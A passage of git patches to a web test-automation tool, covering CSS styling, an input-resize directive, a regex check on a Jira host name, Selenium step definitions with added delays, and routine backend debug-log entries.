font-weight: bold !important; -} - -.exampleList ::ng-deep .mat-form-field-infix { - width: fit-content !important; -} - -.exampleButton{ - height: 20px; - width: 20px; - - -moz-border-radius: 30px; /* or 50% */ - border-radius: 30px; /* or 50% */ - border: 2px solid; - - text-align: center; - - font-weight: bold; - font-size: 12px; - display: inline-block; - color: var(--ocean-blue) - -} - -.darkTheme ::ng-deep .exampleButton { - color: var(--light-blue) -} - - -.exampleMatSelect{ - padding-left: 5px; -} - -.uk-nav > li > span{ - padding: 1px; - cursor: pointer; -} - -:host ::ng-deep .uk-nav > li > .dropdownStep { - color:var(--ocean-blue); -} - -/* :host ::ng-deep .darkTheme .uk-nav > li > .dropdownStep { - color: #40C4FF; -} */ -:host ::ng-deep .darkTheme .uk-nav > li > .dropdownStep { - color: var(--light-blue); -} - -:host ::ng-deep .uk-nav > li > span:hover { - color: gray; -} - -:host ::ng-deep .darkTheme .uk-nav > li > span:hover { - color: white; -} - -:host ::ng-deep .uk-nav > li > .dropdownStepUndefined { - color:var(--marine-blue); -} - -:host ::ng-deep .darkTheme .uk-nav > li > .dropdownStepUndefined { - color:#00B0FF; -} - -#saveButton.iconButton_unsaved em{ - color: red !important; -} - +:host ::ng-deep .stepsListContainer{ + display: flex; + justify-content: space-between; +} + +:host ::ng-deep .stepsListContainer em{ + color: var(--ocean-blue); +} + +:host ::ng-deep .stepsListContainer .disabled em{ + color: gray !important; +} + + +:host ::ng-deep .stepsListContainer button{ + border: none; + background: none; +} + +:host ::ng-deep .checkbox{ + margin-right: 5px; + margin-bottom: 5px; + margin-left: 3px; + margin-top: 5px +} + +:host ::ng-deep .checkbox:hover{ + cursor: pointer; +} + +:host ::ng-deep #checkbox_all_example{ + margin-left: 10px; +} + +:host ::ng-deep #checkbox_all{ + margin-top: 2px; + margin-bottom: 2px; + margin-left: 6px; +} + +.select-item-drag-preview { + background-color: rgba(204, 0, 102, 0); + font-weight: bold; + border: 2px solid #666; + border-radius: 50%; + display: inline-block; + width: 30px; + line-height: 30px; +text-align: center; +} + +input[type=checkbox] { + height: 13px; +} + +.stepsContainer { + white-space: nowrap; + overflow: hidden; + width: 100%; +} + +.stepLine { + box-sizing: border-box; + width: fit-content; + max-width: inherit; + padding: 1px 20px 1px 20px; +} + +.cdk-drop-list-dragging .cdk-drag { + transition: transform 250ms cubic-bezier(0, 0, 0.2, 1); +} + +.dragIconContainer{ + text-align: center; + cursor: move; +} + +em.dragIcon{ + font-size: 18px; + color: black; + background-color: var(--white); + margin-top:1px; +} + +.text-inline{ + display: flex; +} + +.text-inline > button{ + margin: 0 5px; +} + +.text-inline > p > input{ + margin: 0 5px; +} + +.uk-card-title { + font-size: medium; + font-weight: bold; +} + +.pencil_icon { + padding-left: 12px; +} + +:host ::ng-deep .disabled { + color: gray !important; + /* background: var(--white) !important; */ + font-style: italic; + text-decoration: line-through; +} + +:host ::ng-deep .darkTheme .disabled { + color: var(--buttonDisabled) !important; +} + +.checkboxDropdown{ + margin-top: -15px !important; +} + +input[type="text"]{ + margin: 1px; + padding: 1px; + border: none; + border-bottom: 1px solid #333; + position: relative; + top: -2px; + width: auto; + min-width: 5px; +} + +.scenarioBarContainer{ + display: flex; + justify-content: space-between; + border-bottom: 1px solid #e5e5e5; + background-color: #f8f8f8; + margin: 0px 20px; +} + +.scenarioBarContainer button, +.exampleBarContainer button{ + border: none; + background: none; + transform: translate(0px, -3px); + height: 24px; + border-radius: 10%; +} + +.scenarioBarContainer > div, +.exampleBarContainer{ + margin-top: 5px; + margin-bottom: 5px; + padding: 10px 15px; + display: flex; + height: 40px; +} + +/* :host ::ng-deep .scenarioTitle{ + background: transparent; + border: none; + margin-right: 2px; +} */ + +/* .scenarioTitle { + background: transparent; +} */ + +/* :host ::ng-deep .scenarioTitle > em { + color: var(--ocean-blue); + font-size: 24px; + transform: translate(0px, 3px) +} */ + +:host ::ng-deep .scenarioTitle{ + /* background: var(--white); */ + background: transparent; + border: none; + margin-right: 2px; +} + +/* :host ::ng-deep .darkTheme, .scenarioTitle { + background: transparent; +} */ + + +:host ::ng-deep .scenarioTitle > em{ + color: var(--ocean-blue); + font-size: 24px; + transform: translate(0px, 3px) +} + +/*#inputExample{ + background: #f8f8f8; + border-radius: 50%; + height: 24px; + width: 24px; +} +#inputExampleIcon{ + margin-top: -2px; + margin-left: -3px; +}*/ + +.exampleBarContainer{ + border-bottom: 1px solid #e5e5e5; + background-color: #f8f8f8; + display: flex; +} + +.scenarioButton { + margin-right: 10px; +} + +.actionBarButtonGroup{ + margin-left: 3px; +} + +.actionButton{ + margin-left: 10px; +} + +.actionButton > em{ + color: #333; + font-size: 22px; +} + +.darkTheme .actionButton > em { + color:#000000; +} + +.scenarioButton em{ + color: var(--ocean-blue); +} + +.darkTheme.scenarioButton em{ + color: var(--ocean-blue); +} + +.scenarioButton em:active { + background-color: var(--ocean-blue); + color: var(--white); +} + +:host ::ng-deep .disabled input{ + color: gray; + border-bottom: 1px solid gray; +} + +:host ::ng-deep .darkTheme .disabled input { + color: var(--buttonDisabled) !important; + border-color: var(--border); +} + +.uk-dropdown{ + padding: 15px; +} + +/* .darkTheme .uk-dropdown { + background-color: #60767b; +} */ + +.padding{ + padding-top: 20px; + padding-left: 20px; + padding-bottom: 20px; + padding-right: 20px; +} + +/* Eventually not in use */ +.mat-form-field + .mat-form-field { + margin-left: 8px; +} + +:host ::ng-deep .scenarioBarContainer .disabled em{ + color: gray !important; + /* background: #f8f8f8 !important; */ +} + +:host ::ng-deep .darkTheme .scenarioBarContainer .disabled em { + color: var(--buttonDisabled) !important; +} + +.exampleList{ + min-width: 100px; +} + +.exampleList ::ng-deep .mat-form-field-wrapper{ + padding-bottom: 0px !important; +} + +.exampleList ::ng-deep .mat-form-field-underline{ + bottom: 0px !important; +} + +.exampleList ::ng-deep .mat-select-value{ + color: var(--ocean-blue) !important; + font-weight: bold !important; + max-width: max-content !important; +} +.exampleListOption { + font-weight: bold !important; +} + +.exampleList ::ng-deep .mat-form-field-infix { + width: fit-content !important; +} + +.exampleButton{ + height: 20px; + width: 20px; + + -moz-border-radius: 30px; /* or 50% */ + border-radius: 30px; /* or 50% */ + border: 2px solid; + + text-align: center; + + font-weight: bold; + font-size: 12px; + display: inline-block; + color: var(--ocean-blue) + +} + +.darkTheme ::ng-deep .exampleButton { + color: var(--light-blue) +} + + +.exampleMatSelect{ + padding-left: 5px; +} + +.uk-nav > li > span{ + padding: 1px; + cursor: pointer; +} + +:host ::ng-deep .uk-nav > li > .dropdownStep { + color:var(--ocean-blue); +} + +/* :host ::ng-deep .darkTheme .uk-nav > li > .dropdownStep { + color: #40C4FF; +} */ +:host ::ng-deep .darkTheme .uk-nav > li > .dropdownStep { + color: var(--light-blue); +} + +:host ::ng-deep .uk-nav > li > span:hover { + color: gray; +} + +:host ::ng-deep .darkTheme .uk-nav > li > span:hover { + color: white; +} + +:host ::ng-deep .uk-nav > li > .dropdownStepUndefined { + color:var(--marine-blue); +} + +:host ::ng-deep .darkTheme .uk-nav > li > .dropdownStepUndefined { + color:#00B0FF; +} + +#saveButton.iconButton_unsaved em{ + color: red !important; +} + +input.scenario, input.background { + text-align: center; + text-indent: 5px; +} + From 2e6c994eee7847637243f44dac2362f4ed760429 Mon Sep 17 00:00:00 2001 From: Alice-cla Date: Fri, 16 Sep 2022 18:09:07 +0200 Subject: [PATCH 11/50] Resize logic amended + boarder left & right space increased --- .../app/base-editor/base-editor.component.css | 4 ++-- .../base-editor/base-editor.component.html | 6 +++--- .../app/directives/resize-input.directive.ts | 21 ++++++++++++------- 3 files changed, 18 insertions(+), 13 deletions(-) diff --git a/frontend/src/app/base-editor/base-editor.component.css b/frontend/src/app/base-editor/base-editor.component.css index 79eaf44d1..e8f395596 100644 --- a/frontend/src/app/base-editor/base-editor.component.css +++ b/frontend/src/app/base-editor/base-editor.component.css @@ -367,7 +367,7 @@ input[type="text"]{ } input.scenario, input.background { - text-align: center; - text-indent: 5px; + padding-left: 10px; + padding-right: 10px; } diff --git a/frontend/src/app/base-editor/base-editor.component.html b/frontend/src/app/base-editor/base-editor.component.html index 8030fd400..8f614c2a3 100644 --- a/frontend/src/app/base-editor/base-editor.component.html +++ b/frontend/src/app/base-editor/base-editor.component.html @@ -92,8 +92,8 @@
- +
@@ -125,7 +125,7 @@
+ type="text" value="{{currentStep.values[1]}}" on-input="addToValues(step_type_input2.value, j, 1, currentStep.stepType)" style="min-width: 100px"/>
diff --git a/frontend/src/app/directives/resize-input.directive.ts b/frontend/src/app/directives/resize-input.directive.ts index 9b52cde75..f4bf94638 100644 --- a/frontend/src/app/directives/resize-input.directive.ts +++ b/frontend/src/app/directives/resize-input.directive.ts @@ -19,7 +19,7 @@ export class ResizeInputDirective { @HostBinding() class?; @HostListener('change', ['$event']) onChange() { - this.resize('action'); + this.resize('load'); } @HostListener('input', ['$event']) onInput() { @@ -52,23 +52,22 @@ export class ResizeInputDirective { //Set variables let parentWidth = this.setParentWidth(); - let string_coef = 4; - let string_length = this.el.nativeElement.value.length+string_coef; + let string_coef = 6; + let string_length = this.el.nativeElement.value.length; let input_width = this.el.nativeElement.offsetWidth; let coef = 10; //Check if maxWidth exceeded if((parentWidth - input_width + string_length*coef) < this.maxWidth) { - if (string_length == 0 ){ + if (string_length <= 10 ){ this.el.nativeElement.setAttribute('size', this.minWidth); } else { - this.el.nativeElement.setAttribute('size', string_length); + this.el.nativeElement.setAttribute('size', string_length-string_coef); } } else { let gap = (this.maxWidth - parentWidth); - if (gap > 0){ - + if (gap >= 0){ if (mode_type == 'action') { this.el.nativeElement.setAttribute('size', this.el.nativeElement.getAttribute('size')); } @@ -78,7 +77,13 @@ export class ResizeInputDirective { } } else { - this.el.nativeElement.setAttribute('size', this.minWidth); + if (mode_type == 'action') { + this.el.nativeElement.setAttribute('size', this.el.nativeElement.getAttribute('size')+gap); + } + if (mode_type == 'load') { + let width = (input_width - gap)/coef; + this.el.nativeElement.setAttribute('size', width); + } } } } From 00ab4091d6ba1a1a4c1fc6b6bc7b6eafd4f61fb7 Mon Sep 17 00:00:00 2001 From: Nataliia Karmazina Date: Tue, 18 Oct 2022 13:49:01 +0200 Subject: [PATCH 12/50] Warning after Submit(Examples) --- .../app/modals/new-example/new-example.component.html | 8 ++++---- .../app/modals/new-example/new-example.component.ts | 11 +++++++++-- 2 files changed, 13 insertions(+), 6 deletions(-) diff --git a/frontend/src/app/modals/new-example/new-example.component.html b/frontend/src/app/modals/new-example/new-example.component.html index 8d880d69d..245e2a4d0 100644 --- a/frontend/src/app/modals/new-example/new-example.component.html +++ b/frontend/src/app/modals/new-example/new-example.component.html @@ -15,16 +15,16 @@ drive_file_rename_outline
- +
diff --git a/frontend/src/app/modals/new-example/new-example.component.ts b/frontend/src/app/modals/new-example/new-example.component.ts index 8463b749e..148e87834 100644 --- a/frontend/src/app/modals/new-example/new-example.component.ts +++ b/frontend/src/app/modals/new-example/new-example.component.ts @@ -74,9 +74,16 @@ export class NewExampleComponent{ this.modalReference.close(); } } - + uniqueExample() { + const button = (document.getElementById('submitExample')) as HTMLButtonElement; + if(this.exampleNames != undefined) { + button.disabled = false; + } else { + this.uniqueExampleName(); + } + } uniqueExampleName(){ - this.apiService.uniqueExampleName('submitExample', this.newExampleForm.value.newName, this.exampleNames) + this.apiService.uniqueExampleName('submitExample', this.newExampleForm.value.newName, this.exampleNames) } } From a40ea62b5f858ed9aa68224ee70702506805eb68 Mon Sep 17 00:00:00 2001 From: Jan Drebinger Date: Fri, 21 Oct 2022 16:34:55 +0200 Subject: [PATCH 13/50] added regex check for jiraHost --- backend/src/serverRouter/jiraRouter.js | 28 +++++++++++++++++--------- 1 file changed, 19 insertions(+), 9 deletions(-) diff --git a/backend/src/serverRouter/jiraRouter.js b/backend/src/serverRouter/jiraRouter.js index 03341bd00..e80c4c22e 100644 --- a/backend/src/serverRouter/jiraRouter.js +++ b/backend/src/serverRouter/jiraRouter.js @@ -41,15 +41,25 @@ router.post('/user/create/', (req, res) => { Authorization: `Basic ${auth}` } }; - fetch(`http://${jiraHost}/rest/auth/1/session`, options) - .then((response) => response.json()) - .then(() => { - helper.updateJira(req.user._id, req.body) - .then((result) => { - res.status(200).json(result); - }); - }).catch((error)=>console.error(error)); - res.status(401).json('User doesnt exist.');//in case of error + const re = new RegExp('^[.:a-zA-Z0-9]+$');//jiraHost must only consist of letters, numbes, '.' and ':' to represent URLs or IPs and ports + const jiraHost_forgeCheck = re.test(jiraHost); + if(jiraHost_forgeCheck){ + const jiraURL = `http://${jiraHost}/rest/auth/1/session` + fetch(jiraURL, options) + .then((response) => response.json()) + .then(() => { + helper.updateJira(req.user._id, req.body) + .then((result) => { + res.status(200).json(result); + }); + }).catch((error)=>console.error(error)); + res.status(401).json('User doesnt exist.');//in case of error + } else { + console.error('Given JiraHost does not comply with URL structure.'); + res.status(401) + .json('Given JiraHost does not comply with URL structure.'); + } + } else { console.error('User doesnt exist.'); res.status(401) From 392b01a9c292221fc7800733d85ddaee1d3ecc7d Mon Sep 17 00:00:00 2001 From: Sorna Date: Wed, 2 Nov 2022 07:01:35 +0100 Subject: [PATCH 14/50] minor fixes for daisy server --- backend/features/step_definitions/stepdefs.js | 98 +- backend/logs/backend_debug.log | 4466 +++++++++++++++++ backend/logs/front.log | 1276 +++++ 3 files changed, 5792 insertions(+), 48 deletions(-) diff --git a/backend/features/step_definitions/stepdefs.js b/backend/features/step_definitions/stepdefs.js index ddec9e36a..e5e57cdd4 100644 --- a/backend/features/step_definitions/stepdefs.js +++ b/backend/features/step_definitions/stepdefs.js @@ -102,7 +102,7 @@ Before(async function () { // / #################### GIVEN ######################################## Given('As a {string}', async function (string) { this.role = string; - // await driver.sleep(currentParameters.waitTime); + // await driver.sleep(100 + currentParameters.waitTime); }); Given('I am on the website: {string}', async function getUrl(url) { @@ -116,7 +116,7 @@ Given('I am on the website: {string}', async function getUrl(url) { }); throw Error(e); } - await driver.sleep(currentParameters.waitTime); + await driver.sleep(100 + currentParameters.waitTime); }); Given('I add a cookie with the name {string} and value {string}', async function addCookie(name, value) { @@ -129,7 +129,7 @@ Given('I add a cookie with the name {string} and value {string}', async function }); throw Error(e); } - await driver.sleep(currentParameters.waitTime); + await driver.sleep(100 + currentParameters.waitTime); }); Given('I remove a cookie with the name {string}', async function removeCookie(name) { @@ -142,7 +142,7 @@ Given('I remove a cookie with the name {string}', async function removeCookie(na }); throw Error(e); } - await driver.sleep(currentParameters.waitTime); + await driver.sleep(100 + currentParameters.waitTime); }); // Take a Screenshot @@ -160,7 +160,7 @@ Given('I take a screenshot', async function () { }); throw Error(e); } - await driver.sleep(currentParameters.waitTime); + await driver.sleep(100 + currentParameters.waitTime); }); // Take a Screenshot and optionally scroll to a specific element @@ -185,7 +185,7 @@ Given('I take a screenshot. Optionally: Focus the page on the element {string}', }); throw Error(e); }) - await driver.sleep(currentParameters.waitTime); + await driver.sleep(100 + currentParameters.waitTime); }); // ################### WHEN ########################################## @@ -201,7 +201,7 @@ When('I go to the website: {string}', async function getUrl(url) { }); throw Error(e); } - await driver.sleep(currentParameters.waitTime); + await driver.sleep(100 + currentParameters.waitTime); }); // clicks a button if found in html code with xpath, @@ -212,34 +212,36 @@ When('I click the button: {string}', async function clickButton(button) { await driver.getCurrentUrl() .then(async (currentUrl) => { - // for DAISY only: - // don't throw an error and end the testcase if "Alte Sitzung Beenden" is not found - if (button === 'Alte Sitzung beenden') { - try { - await driver.wait(until.elementLocated(By.xpath(`//*[@name='kill-session']`)), 3 * 1000).click(); - } catch (e) { - console.log('Button "Alte Sitzung beenden" not found. Skipping the Step...'); - } - return; - } // prevent Button click on "Run Story" or "Run Scenario" to prevent recursion if ((currentUrl === 'http://localhost:4200/' || currentUrl === 'https://seed-test-frontend.herokuapp.com/') && button.toLowerCase() .match(/^run[ _](story|scenario)$/) !== null) throw new Error('Executing Seed-Test inside a scenario is not allowed, to prevent recursion!'); }); - const promises = []; - for(const idString of identifiers){ - promises.push( driver.wait(until.elementLocated(By.xpath(idString)), searchTimeout, `Timed out after ${searchTimeout} ms`, 100) ) - } - await Promise.any(promises) - .then((elem) => elem.click()) - .catch(async (e) => { - await driver.takeScreenshot().then(async (buffer) => { - world.attach(buffer, 'image/png'); + // for DAISY only: + // don't throw an error and end the testcase if "Alte Sitzung Beenden" is not found + if (button === 'Alte Sitzung beenden') { + try { + await driver.sleep(100); + await driver.wait(until.elementLocated(By.xpath(`//*[@name='kill-session']`)), 3 * 1000).click(); + } catch (e) { + console.log('Button "Alte Sitzung beenden" not found. Skipping the Step...'); + } + return; + } else { + const promises = []; + for(const idString of identifiers){ + promises.push( driver.wait(until.elementLocated(By.xpath(idString)), searchTimeout, `Timed out after ${searchTimeout} ms`, 100) ) + } + await Promise.any(promises) + .then((elem) => elem.click()) + .catch(async (e) => { + await driver.takeScreenshot().then(async (buffer) => { + world.attach(buffer, 'image/png'); + }); + throw Error(e); }); - throw Error(e); - }); - await driver.sleep(currentParameters.waitTime); + } + await driver.sleep(100 + currentParameters.waitTime); }); // selenium sleeps for a certain amount of time @@ -285,7 +287,7 @@ When('I insert {string} into the field {string}', async function fillTextField(v }); throw Error(e); }) - await driver.sleep(currentParameters.waitTime); + await driver.sleep(100 + currentParameters.waitTime); }); // "Radio" @@ -304,7 +306,7 @@ When('I select {string} from the selection {string}', async function clickRadioB }); throw Error(e); }) - await driver.sleep(currentParameters.waitTime); + await driver.sleep(100 + currentParameters.waitTime); }); // Select an Option from a dropdown-menu @@ -326,7 +328,7 @@ When('I select the option {string} from the drop-down-menue {string}', async fun throw Error(e); }) - await driver.sleep(currentParameters.waitTime); + await driver.sleep(100 + currentParameters.waitTime); }); // Dropdown via XPath: @@ -340,7 +342,7 @@ When('I select the option {string}', async function selectviaXPath(dropd) { }); throw Error(e); } - await driver.sleep(currentParameters.waitTime); + await driver.sleep(100 + currentParameters.waitTime); }); // Hover over element and Select an Option @@ -383,7 +385,7 @@ When('I hover over the element {string} and select the option {string}', async f } } } - await driver.sleep(currentParameters.waitTime); + await driver.sleep(100 + currentParameters.waitTime); }); // TODO: @@ -420,7 +422,7 @@ When('I check the box {string}', async function checkBox(name) { }) // await driver.wait(async () => driver.executeScript('return document.readyState').then(async (readyState) => readyState === 'complete')); - await driver.sleep(currentParameters.waitTime); + await driver.sleep(100 + currentParameters.waitTime); }); When('Switch to the newly opened tab', async function switchToNewTab() { @@ -434,7 +436,7 @@ When('Switch to the newly opened tab', async function switchToNewTab() { }); throw Error(e); } - await driver.sleep(currentParameters.waitTime); + await driver.sleep(100 + currentParameters.waitTime); }); When('Switch to the tab number {string}', async function switchToSpecificTab(numberOfTabs) { @@ -455,7 +457,7 @@ When('Switch to the tab number {string}', async function switchToSpecificTab(num }); throw Error(e); } - await driver.sleep(currentParameters.waitTime); + await driver.sleep(100 + currentParameters.waitTime); }); // TODO: delete this following step (also in DB), once every branch has the changes @@ -470,7 +472,7 @@ When('I switch to the next tab', async function switchToNewTab() { }); throw Error(e); } - await driver.sleep(currentParameters.waitTime); + await driver.sleep(100 + currentParameters.waitTime); }); When('I want to upload the file from this path: {string} into this uploadfield: {string}', @@ -489,7 +491,7 @@ When('I want to upload the file from this path: {string} into this uploadfield: }); throw Error(e); }) - await driver.sleep(currentParameters.waitTime); + await driver.sleep(100 + currentParameters.waitTime); }); // ################### THEN ########################################## @@ -506,7 +508,7 @@ Then('So I will be navigated to the website: {string}', async function checkUrl( }); throw Error(e); } - await driver.sleep(currentParameters.waitTime); + await driver.sleep(100 + currentParameters.waitTime); }); // Search a textfield in the html code and assert it with a Text @@ -533,7 +535,7 @@ Then('So I can see the text {string} in the textbox: {string}', async function c }); throw Error(e); }) - await driver.sleep(currentParameters.waitTime); + await driver.sleep(100 + currentParameters.waitTime); }); // Search if a is text in html code @@ -556,7 +558,7 @@ Then('So I can see the text: {string}', async function (string) { // text is pre }); throw Error(e); } - await driver.sleep(currentParameters.waitTime); + await driver.sleep(100 + currentParameters.waitTime); }); // Search a textfield in the html code and assert if it's empty @@ -582,7 +584,7 @@ Then('So I can\'t see text in the textbox: {string}', async function (label) { await driver.takeScreenshot().then(async (buffer) => { world.attach(buffer, 'image/png'); }); - await driver.sleep(currentParameters.waitTime); + await driver.sleep(100 + currentParameters.waitTime); }); Then('So a file with the name {string} is downloaded in this Directory {string}', @@ -603,7 +605,7 @@ Then('So a file with the name {string} is downloaded in this Directory {string}' }); throw Error(e); } - await driver.sleep(currentParameters.waitTime); + await driver.sleep(100 + currentParameters.waitTime); }); // Search if a text isn't in html code @@ -624,7 +626,7 @@ Then('So I can\'t see the text: {string}', async function checkIfTextIsMissing(t }); throw Error(e); } - await driver.sleep(currentParameters.waitTime); + await driver.sleep(100 + currentParameters.waitTime); }); // Check if a checkbox is set (true) or not (false) @@ -650,7 +652,7 @@ Then('So the checkbox {string} is set to {string} [true OR false]', async functi }); throw Error(e); }) - await driver.sleep(currentParameters.waitTime); + await driver.sleep(100 + currentParameters.waitTime); }); // Closes the webdriver (Browser) @@ -658,13 +660,13 @@ Then('So the checkbox {string} is set to {string} [true OR false]', async functi After(async () => { if (currentParameters.oneDriver) { scenarioIndex += 1; - await driver.sleep(500); + await driver.sleep(1000); if (scenarioIndex === testLength) { await driver.quit(); } } else { scenarioIndex += 1; - await driver.sleep(500); + await driver.sleep(1000); await driver.quit(); } }); diff --git a/backend/logs/backend_debug.log b/backend/logs/backend_debug.log index 823d89ba6..94c1a5462 100644 --- a/backend/logs/backend_debug.log +++ b/backend/logs/backend_debug.log @@ -1097,3 +1097,4469 @@ 2022-10-27T06:52:24.282Z debug: [1666853221899, duration: 322382] POST:/Group/6141b33c8d8d103294c86a13/635a21b2a1efa41754feb9cb, reqOrigin: ::1, resCode: 200 2022-10-27T06:52:24.608Z debug: [1666853544562, duration: 45] GET:/report/635a2aa84efa73278c610061, reqOrigin: ::1, resCode: 200 2022-10-27T06:56:59.008Z debug: [1666853819005, duration: 2] GET:/saveReport/635a2aa84efa73278c610061, reqOrigin: ::1, resCode: 200 +2022-10-30T17:22:00.799Z debug: [1667150520693, duration: 103] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-30T17:22:00.925Z debug: [1667150520911, duration: 13] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-30T17:22:00.984Z debug: [1667150520975, duration: 8] GET:/6238538930768bfa183c93ad, reqOrigin: ::1, resCode: 304 +2022-10-30T17:22:01.137Z debug: [1667150521123, duration: 13] GET:/stepTypes, reqOrigin: ::1, resCode: 200 +2022-10-30T17:22:01.167Z debug: [1667150521126, duration: 33] GET:/6238538930768bfa183c93ad, reqOrigin: ::1, resCode: 304 +2022-10-30T17:22:01.261Z debug: [1667150521112, duration: 148] GET:/stories/?repoName=HAH&source=db&id=6238538930768bfa183c93ad, reqOrigin: ::1, resCode: 304 +2022-10-30T17:22:16.590Z debug: [1667150536586, duration: 3] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 200 +2022-10-30T17:22:16.698Z debug: [1667150536691, duration: 6] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-30T17:22:16.702Z debug: [1667150536693, duration: 7] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-30T17:22:16.718Z debug: [1667150536658, duration: 58] GET:/stories/?repoName=Seed-Dev&source=db&id=60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 200 +2022-10-30T17:22:16.732Z debug: [1667150536725, duration: 6] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-30T17:22:16.733Z debug: [1667150536729, duration: 4] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-30T17:22:16.792Z debug: [1667150536772, duration: 20] GET:/stories/?repoName=Seed-Dev&source=db&id=60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-30T17:22:18.725Z debug: [1667150538721, duration: 4] GET:/getBlocks/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 200 +2022-10-30T17:22:18.807Z debug: [1667150538788, duration: 6] GET:/getBlocks/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-30T17:23:03.746Z debug: [1667150583737, duration: 8] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-30T17:23:03.816Z debug: [1667150583806, duration: 9] GET:/user/, reqOrigin: ::1, resCode: 200 +2022-10-30T17:23:05.577Z debug: [1667150585573, duration: 3] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-30T17:23:05.619Z debug: [1667150585614, duration: 3] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-30T17:23:05.623Z debug: [1667150585620, duration: 2] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-30T17:23:05.639Z debug: [1667150585605, duration: 34] GET:/stories/?repoName=Seed-Dev&source=db&id=60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-30T17:23:13.033Z debug: [1667150593030, duration: 3] GET:/getBlocks/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-30T17:23:13.095Z debug: [1667150593091, duration: 3] GET:/getBlocks/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-30T17:23:35.878Z debug: [1667150615876, duration: 2] GET:/logout, reqOrigin: ::1, resCode: 304 +2022-10-30T17:25:32.433Z debug: [1667150732347, duration: 85] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-30T17:25:32.521Z debug: [1667150732510, duration: 11] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-30T17:25:33.781Z debug: [1667150733778, duration: 3] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-30T17:25:33.857Z debug: [1667150733849, duration: 8] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-30T17:25:33.859Z debug: [1667150733855, duration: 4] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-30T17:25:33.874Z debug: [1667150733845, duration: 29] GET:/stories/?repoName=Seed-Dev&source=db&id=60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-30T17:25:35.732Z debug: [1667150735729, duration: 3] GET:/getBlocks/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-30T17:25:35.769Z debug: [1667150735765, duration: 3] GET:/getBlocks/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-30T17:25:42.484Z debug: [1667150742482, duration: 2] GET:/logout, reqOrigin: ::1, resCode: 304 +2022-10-30T17:27:30.633Z debug: [1667150850544, duration: 88] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-30T17:27:30.680Z debug: [1667150850670, duration: 10] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-30T17:27:30.721Z debug: [1667150850718, duration: 2] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-30T17:27:30.798Z debug: [1667150850788, duration: 9] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-30T17:27:30.799Z debug: [1667150850794, duration: 5] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-30T17:27:30.808Z debug: [1667150850787, duration: 21] GET:/stories/?repoName=Seed-Dev&source=db&id=60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-30T17:27:31.882Z debug: [1667150851879, duration: 3] GET:/getBlocks/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-30T17:27:31.914Z debug: [1667150851909, duration: 5] GET:/getBlocks/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-30T17:28:08.705Z debug: [1667150888704, duration: 1] GET:/logout, reqOrigin: ::1, resCode: 304 +2022-10-30T17:28:15.606Z debug: [1667150895521, duration: 85] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-30T17:28:15.650Z debug: [1667150895640, duration: 9] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-30T17:28:15.695Z debug: [1667150895690, duration: 4] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-30T17:28:15.786Z debug: [1667150895779, duration: 6] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-30T17:28:15.786Z debug: [1667150895781, duration: 5] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-30T17:28:15.794Z debug: [1667150895775, duration: 18] GET:/stories/?repoName=Seed-Dev&source=db&id=60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-30T17:28:26.152Z debug: [1667150906150, duration: 2] GET:/stepTypes, reqOrigin: ::1, resCode: 304 +2022-10-30T17:28:26.339Z debug: [1667150906336, duration: 3] GET:/api/favicon.ico, reqOrigin: ::1, resCode: 404 +2022-10-30T17:29:29.262Z debug: [1667150969258, duration: 4] GET:/stepTypes, reqOrigin: ::1, resCode: 200 +2022-10-30T17:29:31.631Z debug: [1667150971629, duration: 2] GET:/logout, reqOrigin: ::1, resCode: 304 +2022-10-30T17:29:32.900Z debug: [1667150972816, duration: 83] POST:/login, reqOrigin: ::1, resCode: 200 +2022-10-30T17:29:32.942Z debug: [1667150972934, duration: 8] GET:/repositories, reqOrigin: ::1, resCode: 304 +2022-10-30T17:29:32.988Z debug: [1667150972980, duration: 3] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-30T17:29:33.048Z debug: [1667150973044, duration: 4] GET:/60d0c175204b292bec9cf594, reqOrigin: ::1, resCode: 304 +2022-10-30T17:29:33.050Z debug: [1667150973045, duration: 5] GET:/stepTypes, 